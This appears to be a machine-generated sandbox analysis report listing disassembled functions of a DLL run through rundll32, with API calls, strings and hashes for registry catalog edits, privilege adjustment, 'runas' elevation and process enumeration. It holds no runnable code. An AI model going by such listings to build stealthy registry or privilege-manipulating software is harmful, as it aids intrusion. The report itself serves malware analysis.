Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Timefree$??3@System$FileMutexRelease
String ID: AND $ SLEV = %d $ TYPE = %d$ WHERE $DELETE FROM 'MT' $INSERT INTO "MT" VALUES ( ?,?,?,?,?,?,?,?,?,?,?,?,NULL ) $ModName LIKE '$TimeStamp < %I64d;
API String ID: 2360919559-3261407791
Opcode ID: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
Instruction ID: fbbc87ecfbf22c2b8803d4662eccf4799cfebf60f86054df91e993a66dbd8da4
Opcode Fuzzy Hash: 0fdc13341be9cf7c256e26cb2936a3b5a8a79f5d9c0121a176094682301e8f56
Instruction Fuzzy Hash: B102B332711A4C85FFB29BA5D4403DD2361AB887D8F148627BE2E6B7D4DE3AC649C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052FD8 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 303registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000018005303F
LeaveCriticalSection.KERNEL32 ref: 0000000180053088
RegOpenKeyExW.ADVAPI32 ref: 0000000180053228
RegDeleteKeyW.ADVAPI32 ref: 0000000180053296
RegCloseKey.ADVAPI32 ref: 00000001800532E1

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

Strings

Num_Catalog_Entries64, xrefs: 00000001800530A2
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d, xrefs: 0000000180053359
%s\%s, xrefs: 0000000180053267
Catalog_Entries, xrefs: 00000001800530BD
Catalog_Entries64, xrefs: 00000001800530B6
Num_Catalog_Entries, xrefs: 00000001800530A9
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s, xrefs: 00000001800531D2
NameSpace_Catalog5, xrefs: 00000001800533D8

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$CloseDeleteEnterLeaveOpenmemset
String ID: %s\%s$Catalog_Entries$Catalog_Entries64$NameSpace_Catalog5$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\%s\%012d
API String ID: 2413450229-732542554
Opcode ID: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
Instruction ID: 3ab1713314ff84c9548747a70e29f101a91a5434d94fe8d6158548384223fcd6
Opcode Fuzzy Hash: 5d3b3c8892c10d7fff7567f6933cd8fc0a8177a7f871dcf3f8d0113f8f36deb6
Instruction Fuzzy Hash: 69C1DEB1701A4D82EEA6DB29E8457D963A0F788BD4F04C422FE0D1B7A5DF39C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000834C Relevance: 19.8, APIs: 13, Instructions: 336stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CA7
Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008CD3
Part of subcall function 0000000180008C68: CharNextW.USER32 ref: 0000000180008D81

lstrcmpiW.KERNEL32(?,00000000,00000000,?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000), ref: 00000001800083C8
lstrcmpiW.KERNEL32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800083E6
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008457
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 0000000180008541
CharNextW.USER32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 000000018000855D
RegSetValueExW.ADVAPI32(?,?,00000000,00000000,0000000180009076,?,?,00000000,?,?,00000000,00000000,00000000,000000018000976A), ref: 00000001800085C2

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CharNext$lstrcmpi$Value
String ID:
API String ID: 3520330261-0
Opcode ID: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
Instruction ID: 54a0f5542f62afcd6411b2081a4c08be2fbbe8d603b0a409542dd15f8ed12d0a
Opcode Fuzzy Hash: e6b0475dc37a1ccc9b5f93fb3a52cf7f5178555000e54cf4b197682acd1df91f
Instruction Fuzzy Hash: D3D1643260864982FBA2DB15E8543DA76E1FB9C7D0F91C121BA99476E4EF38C74DD700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060174 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 270COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800601FC
SHGetValueW.SHLWAPI ref: 0000000180060257
_wtoi.MSVCRT ref: 000000018006029F
_wtoi.MSVCRT ref: 00000001800602B1
_wtoi.MSVCRT ref: 00000001800602C3
_wtoi.MSVCRT ref: 00000001800602D5
SHSetValueW.SHLWAPI ref: 0000000180060468
??3@YAXPEAX@Z.MSVCRT ref: 000000018006050C

Strings

MontiorInfo, xrefs: 0000000180060244, 0000000180060455
%d|%d|%d|%d, xrefs: 0000000180060404
MsgCenter, xrefs: 000000018006021A, 000000018006042C, 0000000180060436

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _wtoi$Value$??3@memset
String ID: %d|%d|%d|%d$MontiorInfo$MsgCenter
API String ID: 1219333133-3184008533
Opcode ID: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
Instruction ID: 3a97e8b4d36ab7b0ff62b7c8c746816c118d75ce1dcaba847e92933311b9e76e
Opcode Fuzzy Hash: 5a13214d90345a148425d7b4cec5787b2bbb9191422684e28f36f8c5be619ee2
Instruction Fuzzy Hash: FDC1B472604B4887EB51CF29E84039E77A1F789BA4F208216FAAD577A4DF78D644CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040CB0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 0000000180040CEF
memset.MSVCRT ref: 0000000180040D0A
SHGetValueW.SHLWAPI ref: 0000000180040D49
atoi.MSVCRT ref: 0000000180040D70
GetVersion.KERNEL32 ref: 0000000180040D80
GetModuleHandleW.KERNEL32 ref: 0000000180040DD0
GetProcAddress.KERNEL32 ref: 0000000180040DE0

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0000000180040D3B
RtlGetVersion, xrefs: 0000000180040DD9
ntdll.dll, xrefs: 0000000180040DC9
CurrentVersion, xrefs: 0000000180040D34

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Version$AddressHandleModuleProcValueatoimemset
String ID: CurrentVersion$RtlGetVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$ntdll.dll
API String ID: 1009632096-1820686997
Opcode ID: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
Instruction ID: 603b8f84a57364ab934b969a098bbde4f8155cf87e7eb2653b8acdc6aa15b94a
Opcode Fuzzy Hash: 96873d62ae8b00b27b2edc00cc4e017e8c26c7791766384428e26c81b31d8715
Instruction Fuzzy Hash: 0F416D31615A498AF792CF20EC883DB77A0F78C7A5F918115F56A426A8DF3CD24CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003A8D4 Relevance: 16.6, APIs: 11, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A907
FindResourceW.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A91F
SizeofResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A933
LoadResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A942
LockResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A953
malloc.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A964
memmove.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A97B
FreeResource.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A983
FreeLibrary.KERNEL32(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A98C
VerQueryValueW.VERSION(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9B4
free.MSVCRT(?,00000000,?,?,00000000,000000018003AAB8,?,?,?,?,00000000), ref: 000000018003A9D9

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Resource$FreeLibraryLoad$FindLockQuerySizeofValuefreemallocmemmove
String ID:
API String ID: 3317409091-0
Opcode ID: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
Instruction ID: 8185c375a913dccbf35fde3c3455573a2fd048fb7f01b55c3a130ccbeb9ebe14
Opcode Fuzzy Hash: d575d481ff84caad7d8740059adda23fe9f9648e66c4b8f54cfb60a62ec78070
Instruction Fuzzy Hash: 09316B35606B4886EA86DF16AC0479AB3E4BB4DFC0F0A8426AE4907764EF3CD649C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800647B0 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064800

Part of subcall function 0000000180035E24: ??2@YAPEAX_K@Z.MSVCRT ref: 0000000180035ED4
Part of subcall function 0000000180035E24: memmove.MSVCRT ref: 0000000180035F42
Part of subcall function 0000000180035E24: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180035F7C

??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800648B2
SysFreeString.OLEAUT32 ref: 0000000180064941
SysAllocString.OLEAUT32 ref: 000000018006495E
GetFileAttributesW.KERNEL32 ref: 0000000180064BC3
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180064D1C
??3@YAXPEAX@Z.MSVCRT ref: 0000000180064D8E
LeaveCriticalSection.KERNEL32 ref: 0000000180064DAC

Strings

360util, xrefs: 00000001800649C6, 0000000180064C35

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@CriticalSectionString$??2@AllocAttributesEnterFileFreeLeavememmove
String ID: 360util
API String ID: 2488163691-2294763832
Opcode ID: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
Instruction ID: 9938724ed40c23cc8900e9648d175c046ed33f6fe674e618e7d9782a5817fc1c
Opcode Fuzzy Hash: 04b2a6e28f52e73c8fb9b448fab7648155792c5097cb6c97d153a05ebb3aa3d7
Instruction Fuzzy Hash: AE029C73B01B488AEB91CB64D8443DD33A6FB48798F519226EE592BB94DF38C619C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180066A90
GetModuleFileNameW.KERNEL32 ref: 0000000180066AA1
GetCommandLineW.KERNEL32 ref: 0000000180066B41
memset.MSVCRT ref: 0000000180066B85
ShellExecuteExW.SHELL32 ref: 0000000180066BCC
CloseHandle.KERNEL32 ref: 0000000180066BE1

Strings

runas, xrefs: 0000000180066B9B
/elevated, xrefs: 0000000180066B55
MPR.dll, xrefs: 0000000180066AC1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memset$CloseCommandExecuteFileHandleLineModuleNameShell
String ID: /elevated$MPR.dll$runas
API String ID: 3400839104-479190379
Opcode ID: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
Instruction ID: c5738ef19aefcfe0893ce15e6bbb4f81d570db0aa822fd902f1c1618a14612e4
Opcode Fuzzy Hash: ff0e70aebe942903d03514da05f5171b976ef8719cbab5a1757af81890fa035d
Instruction Fuzzy Hash: 35518F32611B4481EB919B29D85039A73A5FB88BF4F108316FABE437E4DF38C649C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070760 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000000018007078B
memset.MSVCRT ref: 00000001800707E0
RtlCaptureContext.KERNEL32 ref: 00000001800707FC
RtlLookupFunctionEntry.KERNEL32 ref: 0000000180070814
RtlVirtualUnwind.KERNEL32 ref: 0000000180070852
IsDebuggerPresent.KERNEL32 ref: 0000000180070893
SetUnhandledExceptionFilter.KERNEL32 ref: 000000018007089D
UnhandledExceptionFilter.KERNEL32 ref: 00000001800708A8
GetCurrentProcess.KERNEL32 ref: 00000001800708BE
TerminateProcess.KERNEL32 ref: 00000001800708CC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterPresentProcessUnhandled$CaptureContextCurrentDebuggerEntryFeatureFunctionLookupProcessorTerminateUnwindVirtualmemset
String ID:
API String ID: 2775880128-0
Opcode ID: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
Instruction ID: 97518c6b28749f0b1885d3d6b1dd33bd68934808d59c248e1302251445d11ba7
Opcode Fuzzy Hash: 720e268603e6e9f10860910523c2ba7112bd240762bfe9a634b271c2e63346d6
Instruction Fuzzy Hash: 1E413032A14B858AE751CF60EC503ED7360F799788F119229EA9D46B69EF78C398C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180049050 Relevance: 15.1, APIs: 10, Instructions: 70COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0000000180049077
GetCurrentProcess.KERNEL32 ref: 0000000180049085
OpenProcessToken.ADVAPI32 ref: 000000018004909B
LookupPrivilegeValueW.ADVAPI32 ref: 00000001800490B4
SetLastError.KERNEL32 ref: 00000001800490DA
AdjustTokenPrivileges.ADVAPI32 ref: 00000001800490FA
GetLastError.KERNEL32 ref: 0000000180049104
CloseHandle.KERNEL32 ref: 0000000180049117
CloseHandle.KERNEL32 ref: 0000000180049120
OpenProcess.KERNEL32 ref: 000000018004914F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Process$CloseCurrentErrorHandleLastOpenToken$AdjustLookupPrivilegePrivilegesValue
String ID:
API String ID: 2007143780-0
Opcode ID: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
Instruction ID: d46f0c18e1a39d64aeb05f722a7361000aff992e322ccff9c5dcc36b437ee35a
Opcode Fuzzy Hash: 6a90cf9bb053f436ae0415ad8c3242d222e7ab952c09d034660e141397cb4a9e
Instruction Fuzzy Hash: 2E218032604B4982EB919F61E8583DA63A1FB8CBD5F458035FA9E47B64DF3CC6498B04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800220D8 Relevance: 14.9, APIs: 1, Strings: 7, Instructions: 878COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00000001800226B1

Part of subcall function 000000018001E59C: ??_U@YAPEAX_K@Z.MSVCRT ref: 000000018001E625
Part of subcall function 000000018001E59C: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018001E6A1

Strings

\command, xrefs: 0000000180022777
shell\, xrefs: 00000001800221CD, 000000018002233D, 00000001800226E2, 0000000180022754, 00000001800228E2
topic, xrefs: 000000018002241A, 0000000180022A06
\Command, xrefs: 0000000180022167
ifexec, xrefs: 00000001800224BC, 0000000180022AAB
\ddeexec, xrefs: 0000000180022307, 0000000180022905
shell, xrefs: 0000000180022CF6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcschr
String ID: \Command$\command$\ddeexec$ifexec$shell$shell\$topic
API String ID: 1497570035-2908898620
Opcode ID: 12b78799499caf5717bc95cbc03fbabe0b66143b482f3ac1f85879ba428f6373
Instruction ID: 575a53dd2e263c1487cf240052cfc12f8aaf5d66da5f39f1f5c7e3cc686b1930
Opcode Fuzzy Hash: 12b78799499caf5717bc95cbc03fbabe0b66143b482f3ac1f85879ba428f6373
Instruction Fuzzy Hash: F1829472601E4996DB51DF69C8403DE3360FB89BF8F449312AA2D576E5EF78CA89C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180017FE8 Relevance: 13.8, APIs: 9, Instructions: 322COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000000180018020
memmove.MSVCRT ref: 0000000180018188
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800181E8
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001820A
??3@YAXPEAX@Z.MSVCRT ref: 000000018001824D

Part of subcall function 0000000180044250: EnterCriticalSection.KERNEL32 ref: 0000000180044280
Part of subcall function 0000000180044250: LeaveCriticalSection.KERNEL32 ref: 00000001800442BA

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018278
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800182AD
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800182D5
??_V@YAXPEAX@Z.MSVCRT ref: 000000018001845E

Part of subcall function 00000001800429F4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042AAA

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$??3@CountEnterLeaveTickmemmove
String ID:
API String ID: 1944083165-0
Opcode ID: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
Instruction ID: f41da155b52ef09f3583e4d9bfd8bf17b476c2db053c24b9ffbabfba65fc2eed
Opcode Fuzzy Hash: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
Instruction Fuzzy Hash: 37E15932B01F449AEB92CFA1E8403DD33B6F748798F148125EE5967B98DE34C65AD344

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800576DC Relevance: 12.3, APIs: 8, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 000000018005830C: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180058356

Part of subcall function 000000018005823C: ??3@YAXPEAX@Z.MSVCRT ref: 000000018005829A

GetSystemMetrics.USER32 ref: 0000000180057725
GetSystemMetrics.USER32 ref: 0000000180057733

Part of subcall function 000000018005760C: MonitorFromWindow.USER32 ref: 0000000180057634
Part of subcall function 000000018005760C: GetForegroundWindow.USER32 ref: 000000018005763D
Part of subcall function 000000018005760C: IsWindow.USER32 ref: 0000000180057657
Part of subcall function 000000018005760C: IsWindowVisible.USER32 ref: 0000000180057664
Part of subcall function 000000018005760C: MonitorFromWindow.USER32 ref: 0000000180057676

GetDesktopWindow.USER32 ref: 0000000180057754
WindowFromPoint.USER32 ref: 00000001800577BD
GetWindowRect.USER32 ref: 00000001800577E2

Part of subcall function 0000000180057FF0: WindowFromPoint.USER32 ref: 000000018005802B
Part of subcall function 0000000180057FF0: GetAncestor.USER32 ref: 0000000180058051
Part of subcall function 0000000180057FF0: GetWindowRect.USER32 ref: 0000000180058071
Part of subcall function 0000000180057FF0: memset.MSVCRT ref: 00000001800580D5
Part of subcall function 0000000180057FF0: StrCmpIW.SHLWAPI ref: 00000001800580F6

memset.MSVCRT ref: 00000001800579C6
memset.MSVCRT ref: 0000000180057A47
WindowFromPoint.USER32 ref: 0000000180057A64

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Window$From$Pointmemset$??3@MetricsMonitorRectSystem$AncestorDesktopForegroundVisible
String ID:
API String ID: 1557469473-0
Opcode ID: 2c64cf9b5a157c200c764c964481ce26847904e65417e42ec88cbcbf6be6bf38
Instruction ID: 69adae8c6d1c9aa0e7a060adc37d123b0b6968a36546a0207d70169ef7657c18
Opcode Fuzzy Hash: 2c64cf9b5a157c200c764c964481ce26847904e65417e42ec88cbcbf6be6bf38
Instruction Fuzzy Hash: 8AD1A3727142488AE7A2CF21A4407EE77A1F78C7C8F548015FA4A67A5ADF3AD649DF00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004B780 Relevance: 12.1, APIs: 8, Instructions: 70processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000000018004B7C7
memset.MSVCRT ref: 000000018004B7E7
Process32FirstW.KERNEL32 ref: 000000018004B7FC
_wcsicmp.MSVCRT ref: 000000018004B80E
ProcessIdToSessionId.KERNEL32 ref: 000000018004B825

Part of subcall function 000000018004B630: memset.MSVCRT ref: 000000018004B661
Part of subcall function 000000018004B630: OpenProcess.KERNEL32 ref: 000000018004B67A
Part of subcall function 000000018004B630: GetModuleFileNameExW.PSAPI ref: 000000018004B69F
Part of subcall function 000000018004B630: CloseHandle.KERNEL32 ref: 000000018004B6A8
Part of subcall function 000000018004B630: _wcsicmp.MSVCRT ref: 000000018004B6CB
Part of subcall function 000000018004B630: memset.MSVCRT ref: 000000018004B6E2

Process32NextW.KERNEL32 ref: 000000018004B84A
